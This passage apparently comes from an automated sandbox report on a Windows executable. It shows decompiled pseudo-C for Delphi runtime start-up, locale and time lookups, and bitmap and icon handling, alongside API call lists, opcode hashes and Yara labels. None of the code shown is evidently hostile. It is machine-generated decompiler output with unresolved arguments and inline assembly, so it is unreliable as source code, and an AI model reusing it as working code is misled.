				 *[fs:eax] = _t24;
				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed
				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040717D);
				return E00403094( &_v8);
			}

0x0040712f
0x00407133
0x00407134
0x00407139
0x0040713c
0x00407144
0x0040715b
0x00407162
0x00407165
0x00407168
0x00407175

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 5a05c1e8a10f4730766ec23987a860b84a9a8f8f1accf6f908e2a5c391a8aaf2
Instruction ID: b1d225a9e8209a88acb6f31443c3fd07cfa988a081e0296b49605001afef9c8a
Opcode Fuzzy Hash: 5a05c1e8a10f4730766ec23987a860b84a9a8f8f1accf6f908e2a5c391a8aaf2
Instruction Fuzzy Hash: 49E09B307083049FD701EB71DC13D1977BCD786704FA14877E500AA5D1DA7D5E10C559

Uniqueness

Uniqueness Score: -1.00%

Function 004052AC, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052AC(void* __eax, void* __ecx, void* __edx) {
				void* __esi;
				void* _t7;
				intOrPtr _t11;
				void* _t14;

				_t14 = __eax;
				_t11 =  *0x40447c; // 0x404488
				_t7 = E004044F8(_t11, 0);
				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
				return _t7;
			}

0x004052b4
0x004052b6
0x004052c3
0x004052cc
0x004052d7

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8

Uniqueness

Uniqueness Score: -1.00%

Function 00402448, Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00402448(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x409030(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402530(1);
					}
				}
				return _t6;
			}

0x0040244b
0x00402462
0x0040244d
0x0040244d
0x00402453
0x00402457
0x0040245b
0x0040245b
0x00402457
0x00402467

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00403D7D, Relevance: 9.0, APIs: 6, Instructions: 41
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
				 *0x40900c = 2;
				 *0x40a010 = 0x401008;
				 *0x40a014 = 0x401010;
				 *0x40a036 = 2;
				 *0x40a000 = E00403960;
				if(E00402808() != 0) {
					_t3 = E00402838();
				}
				E004028FC(_t3);
				 *0x40a03c = 0xd7b0;
				 *0x40a208 = 0xd7b0;
				 *0x40a3d4 = 0xd7b0;
				 *0x40a02c = GetCommandLineA();
				 *0x40a028 = E00401098();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x40a5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x40a020 = _t11;
				return _t11;
			}

0x00403d7d
0x00403d82
0x00403d87
0x00403d89
0x00403d90
0x00403d9a
0x00403da4
0x00403dab
0x00403dbc
0x00403dbe
0x00403dbe
0x00403dc3
0x00403dc8
0x00403dd1
0x00403dda
0x00403de8
0x00403df2
0x00403e06
0x00403e3f
0x00403e08
0x00403e16
0x00403e2e
0x00403e18
0x00403e18
0x00403e18
0x00403e16
0x00403e44
0x00403e49
0x00403e4e

APIs

Part of subcall function 00402808: GetKeyboardType.USER32 ref: 0040280D
Part of subcall function 00402808: GetKeyboardType.USER32 ref: 00402819

GetCommandLineA.KERNEL32 ref: 00403DE3
GetVersion.KERNEL32 ref: 00403DF7
GetVersion.KERNEL32 ref: 00403E08
GetCurrentThreadId.KERNEL32 ref: 00403E44

Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
Part of subcall function 00402838: RegQueryValueExA.ADVAPI32 ref: 0040288D
Part of subcall function 00402838: RegCloseKey.ADVAPI32(?), ref: 004028A3

GetThreadLocale.KERNEL32 ref: 00403E24

Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
Instruction ID: 4e42c8c4ff7c9e6347351f52ed3844a5f6dcad7449c2d11acc3bcf8107044070
Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
Instruction Fuzzy Hash: 7B016DB180438599E710BF72AA4A3193E64AB11309F10853FA080BA3F3D77D06989B6F

Uniqueness

Uniqueness Score: -1.00%

Function 00403CB4, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00403CB4(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x403d1a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004031F4( &_v20, 7,  &_v15);
				E0040269C(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00403D21);
				return E00403094( &_v20);
			}

0x00403cbd
0x00403cc2
0x00403cc3
0x00403cc8
0x00403ccb
0x00403cda
0x00403cea
0x00403cf5
0x00403d00
0x00403d00
0x00403d06
0x00403d09
0x00403d0c
0x00403d19

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b081bb15d237e250e7ac6e628e0310867cb4e253073c48c1e616335acf8350db
Instruction ID: 6d3425cb13dc4e10e5c99e835ecbf0d9b5a709cf75aacf138b47c3a7ed30a7d1
Opcode Fuzzy Hash: b081bb15d237e250e7ac6e628e0310867cb4e253073c48c1e616335acf8350db
Instruction Fuzzy Hash: DDF0C830904209AFEB04DFA2CC42ADEF77EFB88714F10887AA110675C0EBB82B04C648

Uniqueness

Uniqueness Score: -1.00%

Function 004057D8, Relevance: 1.5, APIs: 1, Instructions: 10
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057D8(void* __fp0) {
				struct _SYSTEMTIME _v16;
				void* _t7;

				GetLocalTime( &_v16);
				return E00405834( &_v16, _t7, __fp0);
			}

0x004057e0
0x004057f6

APIs

GetLocalTime.KERNEL32(?), ref: 004057E0

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
Instruction ID: b0c73d71d4f1c0cd7d69287b67f47955239943ce197f7fb6ed2486fd72728d1c
Opcode Fuzzy Hash: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
Instruction Fuzzy Hash: F2C08C6280490553CA00B724CC0684EB69CAEC0210FC0C9BEA9C8A21F1EB39C72A8787

Uniqueness

Uniqueness Score: -1.00%

Function 0040627C, Relevance: 25.7, APIs: 17, Instructions: 183
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040627C(void* __eax, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				struct HDC__* _v36;
				BITMAPINFO* _v40;
				struct HDC__* _v48;
				struct HDC__* _v56;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* _t59;
				BITMAPINFO* _t62;
				void* _t69;
				void* _t72;
				int _t73;
				int _t76;
				int _t81;
				void* _t82;
				void* _t85;
				void* _t87;
				struct HDC__* _t92;
				void* _t99;
				void* _t105;
				void* _t119;
				struct HDC__* _t124;
				signed int _t126;
				void* _t129;
				struct HBITMAP__* _t130;
				RECT* _t131;
				void* _t133;

				_t133 = __eflags;
				_push(__eax);
				E00406144(__eax);
				_pop(_t59);
				if(_t133 != 0) {
					asm("pushad");
					_t105 = _t59;
					 *((intOrPtr*)(_t105 + 0x34))();
					 *((intOrPtr*)(_t105 + 0x28)) = 0;
					 *((intOrPtr*)(_t105 + 0x56)) = 0;
					 *((intOrPtr*)(_t105 + 0x5a)) = 0;
					asm("jecxz 0x13");
					_t62 =  *(_t105 + 0x3d);
					_t126 = _t62->bmiHeader.biWidth;
					_t124 = _t62->bmiHeader.biHeight;
					if(_t124 < 0) {
						_t124 =  ~_t124;
					}
					_push(CreateCompatibleDC(0));
					_t135 =  *((char*)(_t105 + 0x3c)) - 1;
					if( *((char*)(_t105 + 0x3c)) != 1) {
						asm("jecxz 0xfffffff2");
						_t129 = 0;
						_t115 =  *(_t105 + 0x18);
						_push(E00405F70( *(_t105 + 0x1c),  *((intOrPtr*)(( *(_t105 + 0x49) & 0x000000ff) + 0x409188)),  *(_t105 + 0x18)));
						__eflags =  *(_t105 + 0x49) - 5;
						if( *(_t105 + 0x49) == 5) {
							E0040600C(_t68, _t115);
						}
						_pop(_t69);
						_push(_t69);
						_push(E00406268(_t69) *  *(_t105 + 0x18));
						_t72 = E00402448(E00406268(_t69) *  *(_t105 + 0x18));
						_push(_t72);
						_push(0);
						_push(_v12);
						_push(_t72);
						_t73 =  *(_t105 + 0x18);
						__eflags = _t73 - _t124;
						if(__eflags > 0) {
							_t73 = _t124;
						}
						_t76 = GetDIBits(_v8, E00406154(_t105, __eflags), 0, _t73, ??, ??, ??);
						_t118 =  *(_t105 + 0x18);
						__eflags = _t118 - _t124;
						if(_t118 > _t124) {
							_t118 = _t124;
						}
						__eflags = _t76 - _t118;
						if(__eflags != 0) {
							_pop(_t82);
							E00402468(_t82);
							_push(0);
							_t85 = CreateDIBSection(_v36, _v40, 0, _t131, 0, 0);
							_t126 = _t126 ^ 0xffffffff;
							_t129 = _t85;
							_t87 = SelectObject(_v60, _t129);
							_t118 = _v68;
							__eflags = 0;
							E00406094(_t105, 0, _v68, 0, 0);
							SelectObject(_v72, _t87);
						}
						E00406024(_t105, _t105, _t118, __eflags);
						_pop( *_t47);
						_pop( *_t48);
						_pop( *_t49);
						 *(_t105 + 0x20) = _t129;
						__eflags = _t126;
						 *(_t105 + 0x72) = 0;
						if(_t126 < 0) {
							_t52 = _t105 + 0x72;
							 *_t52 =  *(_t105 + 0x72) + 1;
							__eflags =  *_t52;
						}
					} else {
						_t92 = GetDC(0);
						_t130 = CreateCompatibleBitmap(_t92,  *(_t105 + 0x1c),  *(_t105 + 0x18));
						ReleaseDC(0, _t92);
						_pop(_t121);
						_push(SelectObject(_t121, _t130));
						_push( *(_t105 + 0x18));
						_push( *(_t105 + 0x1c));
						_push(0);
						_t99 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t105 + 0x2c))));
						_t122 = _t131;
						FillRect(_v32, _t131, _t99);
						DeleteObject(_t99);
						asm("jecxz 0x24");
						SelectObject(_v48, 0);
						SetDIBits(_v56, _t130, 0,  *(_t105 + 0x18),  *(_t105 + 0x41),  *(_t105 + 0x3d), 0);
						E00406024(_t105, _t105, _t122, _t135);
						 *(_t105 + 0x20) = _t130;
					}
					asm("jecxz 0xa");
					_pop(_t119);
					 *((intOrPtr*)( *((intOrPtr*)(_t105 + 0x4a))))(_t119);
					_t81 = DeleteDC(_t124);
					asm("popad");
					return _t81;
				}
				return _t59;
			}

0x0040627c
0x0040627c
0x0040627d
0x00406282
0x00406283
0x00406289
0x0040628a
0x0040628c
0x00406291
0x00406294
0x00406297
0x004062a3
0x004062a5
0x004062a8
0x004062ab
0x004062b0
0x004062b2
0x004062b2
0x004062dc
0x004062dd
0x004062e1
0x00406397
0x00406399
0x0040639e
0x004063a6
0x004063a7
0x004063ab
0x004063ad
0x004063ad
0x004063b2
0x004063b3
0x004063be
0x004063bf
0x004063c4
0x004063c5
0x004063c7
0x004063cb
0x004063cc
0x004063cf
0x004063d1
0x004063d3
0x004063d3
0x004063e4
0x004063e9
0x004063ec
0x004063ee
0x004063f0
0x004063f0
0x004063f2
0x004063f4
0x004063f6
0x004063f7
0x004063fe
0x0040640f
0x00406414
0x00406417
0x0040641d
0x00406423
0x00406427
0x0040642c
0x00406435
0x00406435
0x0040643c
0x00406441
0x00406444
0x00406447
0x0040644a
0x0040644d
0x0040644f
0x00406453
0x00406455
0x00406455
0x00406455
0x00406455
0x004062e7
0x004062e9
0x004062fb
0x004062fe
0x00406303
0x0040630c
0x0040630d
0x00406310
0x00406313
0x00406320
0x00406325
0x0040632e
0x00406333
0x0040633e
0x00406344
0x0040635b
0x00406378
0x0040637d
0x0040637d
0x0040645b
0x0040645d
0x00406463
0x00406465
0x0040646a
0x00000000
0x0040646a
0x0040646b

APIs

GetObjectA.GDI32(?,00000018), ref: 004062C2
CreateCompatibleDC.GDI32(00000000), ref: 004062D7
GetDC.USER32(00000000), ref: 004062E9
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004062F6
ReleaseDC.USER32(00000000,00000000), ref: 004062FE
SelectObject.GDI32(00000000), ref: 00406307
CreateSolidBrush.GDI32(00000000), ref: 00406320
FillRect.USER32(?,?,00000000), ref: 0040632E
DeleteObject.GDI32(00000000), ref: 00406333
SelectObject.GDI32(?), ref: 00406344
SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
SelectObject.GDI32(00000000,?), ref: 00406371
GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 0040640F
SelectObject.GDI32(?,00000000), ref: 0040641D
SelectObject.GDI32(?,00000000), ref: 00406435
DeleteDC.GDI32 ref: 00406465

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Object$Select$Create$BitsCompatibleDelete$BitmapBrushFillRectReleaseSectionSolid
String ID:
API String ID: 3348884779-0
Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798

Uniqueness

Uniqueness Score: -1.00%

Function 00406218, Relevance: 16.6, APIs: 11, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				struct HDC__* _v32;
				struct HDC__* _v36;
				BITMAPINFO* _v40;
				struct HDC__* _v48;
				struct HDC__* _v56;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* __ebx;
				void* _t64;
				void* _t66;
				BITMAPINFO* _t69;
				void* _t76;
				void* _t79;
				int _t80;
				int _t83;
				int _t88;
				void* _t89;
				void* _t92;
				void* _t94;
				struct HDC__* _t99;
				void* _t106;
				void* _t113;
				void* _t116;
				void* _t118;
				void* _t120;
				void* _t138;
				struct HDC__* _t142;
				void* _t144;
				int* _t145;
				struct HDC__* _t147;
				signed int _t149;
				void* _t152;
				struct HBITMAP__* _t153;
				RECT* _t154;
				void* _t156;

				_t156 = __eflags;
				_t118 = __eax;
				_t64 = E00406144(__eax);
				if(_t156 == 0) {
					L7:
					if(__eflags != 0) {
						E00406144(_t64);
						_t66 = _t64;
						if(__eflags != 0) {
							asm("pushad");
							_t120 = _t66;
							 *((intOrPtr*)(_t120 + 0x34))();
							 *((intOrPtr*)(_t120 + 0x28)) = 0;
							 *((intOrPtr*)(_t120 + 0x56)) = 0;
							 *((intOrPtr*)(_t120 + 0x5a)) = 0;
							asm("jecxz 0x13");
							_t69 =  *(_t120 + 0x3d);
							_t149 = _t69->bmiHeader.biWidth;
							_t147 = _t69->bmiHeader.biHeight;
							__eflags = _t147;
							if(_t147 < 0) {
								_t147 =  ~_t147;
							}
							_push(CreateCompatibleDC(0));
							__eflags =  *((char*)(_t120 + 0x3c)) - 1;
							if( *((char*)(_t120 + 0x3c)) != 1) {
								asm("jecxz 0xfffffff2");
								_t152 = 0;
								_t134 =  *(_t120 + 0x18);
								_push(E00405F70( *(_t120 + 0x1c),  *((intOrPtr*)(( *(_t120 + 0x49) & 0x000000ff) + 0x409188)),  *(_t120 + 0x18)));
								__eflags =  *(_t120 + 0x49) - 5;
								if( *(_t120 + 0x49) == 5) {
									E0040600C(_t75, _t134);
								}
								_pop(_t76);
								_push(_t76);
								_push(E00406268(_t76) *  *(_t120 + 0x18));
								_t79 = E00402448(E00406268(_t76) *  *(_t120 + 0x18));
								_push(_t79);
								_push(0);
								_push(_v12);
								_push(_t79);
								_t80 =  *(_t120 + 0x18);
								__eflags = _t80 - _t147;
								if(__eflags > 0) {
									_t80 = _t147;
								}
								_t83 = GetDIBits(_v8, E00406154(_t120, __eflags), 0, _t80, ??, ??, ??);
								_t137 =  *(_t120 + 0x18);
								__eflags = _t137 - _t147;
								if(_t137 > _t147) {
									_t137 = _t147;
								}
								__eflags = _t83 - _t137;
								if(__eflags != 0) {
									_pop(_t89);
									E00402468(_t89);
									_push(0);
									_t92 = CreateDIBSection(_v36, _v40, 0, _t154, 0, 0);
									_t149 = _t149 ^ 0xffffffff;
									_t152 = _t92;
									_t94 = SelectObject(_v60, _t152);
									_t137 = _v68;
									__eflags = 0;
									E00406094(_t120, 0, _v68, 0, 0);
									SelectObject(_v72, _t94);
								}
								E00406024(_t120, _t120, _t137, __eflags);
								_pop( *_t51);
								_pop( *_t52);
								_pop( *_t53);
								 *(_t120 + 0x20) = _t152;
								__eflags = _t149;
								 *(_t120 + 0x72) = 0;
								if(_t149 < 0) {
									_t56 = _t120 + 0x72;
									 *_t56 =  &( *(_t120 + 0x72)->i);
									__eflags =  *_t56;
								}
								goto L25;
							} else {
								_t99 = GetDC(0);
								_t153 = CreateCompatibleBitmap(_t99,  *(_t120 + 0x1c),  *(_t120 + 0x18));
								ReleaseDC(0, _t99);
								_pop(_t140);
								_push(SelectObject(_t140, _t153));
								_push( *(_t120 + 0x18));
								_push( *(_t120 + 0x1c));
								_push(0);
								_t106 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t120 + 0x2c))));
								_t141 = _t154;
								FillRect(_v32, _t154, _t106);
								DeleteObject(_t106);
								asm("jecxz 0x24");
								SelectObject(_v48, 0);
								SetDIBits(_v56, _t153, 0,  *(_t120 + 0x18),  *(_t120 + 0x41),  *(_t120 + 0x3d), 0);
								E00406024(_t120, _t120, _t141, __eflags);
								 *(_t120 + 0x20) = _t153;
								L25:
								asm("jecxz 0xa");
								_pop(_t138);
								 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x4a))))(_t138);
								_t88 = DeleteDC(_t147);
								asm("popad");
								return _t88;
							}
						}
						return _t66;
					} else {
						return _t64;
					}
				} else {
					_push(__edx);
					_t64 = E0040648C(_t118, __edx);
					_pop(_t142);
					if(_t64 == _t142) {
						goto L7;
					} else {
						_t113 = _t118;
						if(_t142 != 0) {
							 *(_t118 + 0x49) = _t142;
							__eflags = _t142 - 5;
							if(_t142 == 5) {
								_t142 = _t142 - 1;
								__eflags = _t142;
							}
							L27();
							_t116 = E00405F98( *( *((intOrPtr*)(_t118 + 0x3d)) + 0xe) & 0x0000ffff, 0);
							_t144 = _t142;
							__eflags = _t116 - _t144;
							_t64 = _t118;
							goto L7;
						} else {
							_t145 =  &(_t142->i);
							if(_t145 !=  *(_t113 + 0x3c)) {
								 *(_t113 + 0x3c) = _t145;
								L9();
								return _t113;
							}
							return _t113;
						}
					}
				}
			}

0x00406218
0x00406219
0x0040621b
0x00406220
0x0040625d
0x0040625e
0x0040627d
0x00406282
0x00406283
0x00406289
0x0040628a
0x0040628c
0x00406291
0x00406294
0x00406297
0x004062a3
0x004062a5
0x004062a8
0x004062ab
0x004062ae
0x004062b0
0x004062b2
0x004062b2
0x004062dc
0x004062dd
0x004062e1
0x00406397
0x00406399
0x0040639e
0x004063a6
0x004063a7
0x004063ab
0x004063ad
0x004063ad
0x004063b2
0x004063b3
0x004063be
0x004063bf
0x004063c4
0x004063c5
0x004063c7
0x004063cb
0x004063cc
0x004063cf
0x004063d1
0x004063d3
0x004063d3
0x004063e4
0x004063e9
0x004063ec
0x004063ee
0x004063f0
0x004063f0
0x004063f2
0x004063f4
0x004063f6
0x004063f7
0x004063fe
0x0040640f
0x00406414
0x00406417
0x0040641d
0x00406423
0x00406427
0x0040642c
0x00406435
0x00406435
0x0040643c
0x00406441
0x00406444
0x00406447
0x0040644a
0x0040644d
0x0040644f
0x00406453
0x00406455
0x00406455
0x00406455
0x00406455
0x00000000
0x004062e7
0x004062e9
0x004062fb
0x004062fe
0x00406303
0x0040630c
0x0040630d
0x00406310
0x00406313
0x00406320
0x00406325
0x0040632e
0x00406333
0x0040633e
0x00406344
0x0040635b
0x00406378
0x0040637d
0x00406458
0x0040645b
0x0040645d
0x00406463
0x00406465
0x0040646a
0x00000000
0x0040646a
0x004062e1
0x0040646b
0x00406264
0x00406264
0x00406264
0x00406222
0x00406224
0x00406225
0x0040622a
0x0040622d
0x00000000
0x0040622f
0x00406231
0x00406233
0x0040623c
0x0040623f
0x00406242
0x00406244
0x00406244
0x00406244
0x00406248
0x00406254
0x00406259
0x0040625a
0x0040625c
0x00000000
0x00406235
0x00406236
0x0040647f
0x00406481
0x00406484
0x00000000
0x00406484
0x00406489
0x00406489
0x00406233
0x0040622d

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C

Uniqueness

Uniqueness Score: -1.00%

Function 00406638, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v14;
				char _v17;
				signed int _v18;
				char _v19;
				int _v20;
				void** _v24;
				unsigned int _v28;
				intOrPtr _v32;
				char _v33;
				int _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed short _v58;
				short _v60;
				short _v62;
				intOrPtr _v68;
				void* _v72;
				void** _v76;
				void** _v80;
				intOrPtr _v100;
				signed short _v106;
				short _v108;
				int _v112;
				int _v116;
				char _v120;
				short _v126;
				intOrPtr _v128;
				int _v136;
				int _v140;
				void _v144;
				void* __ebp;
				signed int _t138;
				signed int _t139;
				void* _t141;
				unsigned int _t152;
				void* _t154;
				void* _t162;
				void* _t179;
				void* _t181;
				void* _t199;
				void* _t201;
				void* _t207;
				void* _t212;
				void* _t214;
				signed int _t220;
				void* _t221;
				void* _t229;
				void* _t232;
				void* _t243;
				intOrPtr _t264;
				void* _t274;
				void* _t275;
				int _t293;
				int _t294;
				intOrPtr _t318;
				void* _t324;
				void* _t366;
				void* _t369;
				int _t375;
				int _t376;
				void* _t378;
				void* _t380;
				intOrPtr _t381;

				_t378 = _t380;
				_t381 = _t380 + 0xffffff74;
				_v32 = __ecx;
				_v28 = __edx;
				_v24 = __eax;
				_v33 = 0;
				_v62 = 0;
				_v60 = 1;
				_t138 = _v28 + 1;
				_t139 = _t138 >> 1;
				if(_t138 < 0) {
					asm("adc eax, 0x0");
				}
				_v58 = _t139;
				_t141 = E0040598C(_v32);
				_t384 = _t141 - 6;
				if(_t141 != 6) {
					L59:
					return _v33;
				} else {
					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
					_v68 = E0040456C();
					_v52 = E00405FD8(0, 0, _t384);
					_v56 = E00405FD8(0, 0, _t384);
					_push(_t378);
					_push(0x406b11);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t381;
					_t152 = _v28 >> 1;
					if(_t152 < 0) {
						L22:
						_t154 = _v28 >> 1;
						__eflags = _t154;
						if(_t154 < 0) {
							L57:
							__eflags = 0;
							_pop(_t318);
							 *[fs:eax] = _t318;
							_push(E00406B18);
							E00404520(_v68);
							E00404520(_v52);
							return E00404520(_v56);
						} else {
							_t162 = _t154 + 1;
							__eflags = _t162;
							_v72 = _t162;
							_v40 = 0;
							_v80 = _v24;
							do {
								_t366 =  *_v80;
								_v48 = _v80[1];
								__eflags = _t366;
								if(_t366 != 0) {
									L26:
									GetObjectA(_v48, 0x18,  &_v144);
									_t293 = _v140;
									_t375 = _v136;
									E00402660( &_v120, 0x28);
									_v120 = 0x28;
									_v116 = _t293;
									_v112 = _t375;
									__eflags = _t366;
									if(_t366 != 0) {
										_t243 = _t293 + _t293;
										__eflags = _t243;
										_v112 = _t243;
									}
									_v108 = 1;
									_v18 = E0040465C(_v68, _v40);
									__eflags = _v14;
									if(_v14 == 0) {
										_v14 = E00406580(_v18 & 0x0000ffff);
									}
									_v106 = _v14;
									_push(E004065CC(_t293, _t375, _t378) + 0x28);
									_t179 = E00406624(_t293, _t375);
									_pop(_t324);
									_v100 = _t324 + _t179;
									_t181 = E0040598C(_v32);
									__eflags = _t181 - 0x28;
									if(_t181 == 0x28) {
										__eflags = _t366;
										if(__eflags == 0) {
											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v52, 0x28, 1, _t378, __eflags);
										} else {
											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
											_t220 = _v106 & 0x0000ffff;
											__eflags = _t220 - 0x10;
											if(__eflags > 0) {
												_t221 = _t220 - 0x18;
												__eflags = _t221;
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 6, _t378, __eflags);
												} else {
													__eflags = _t221 - 8;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 7, _t378, __eflags);
													}
												}
											} else {
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 5, _t378, __eflags);
												} else {
													_t229 = _t220 - 1;
													__eflags = _t229;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 1, _t378, __eflags);
													} else {
														_t232 = _t229 - 3;
														__eflags = _t232;
														if(__eflags == 0) {
															E00406218(_v52, 0x28, 2, _t378, __eflags);
														} else {
															__eflags = _t232 - 4;
															if(__eflags == 0) {
																E00406218(_v52, 0x28, 3, _t378, __eflags);
															}
														}
													}
												}
											}
										}
										__eflags =  *(_v52 + 0x41);
										if(__eflags == 0) {
											L54:
											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v56, 0x28, 1, _t378, __eflags);
											E00406624(_t293, _t375);
											_t199 = E0040598C(_v32);
											_t201 = E00406624(_t293, _t375);
											__eflags = _t199 - _t201;
											if(_t199 == _t201) {
												goto L56;
											} else {
												E00402BEC();
												goto L59;
											}
										} else {
											_t207 = E0040598C(_v32);
											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
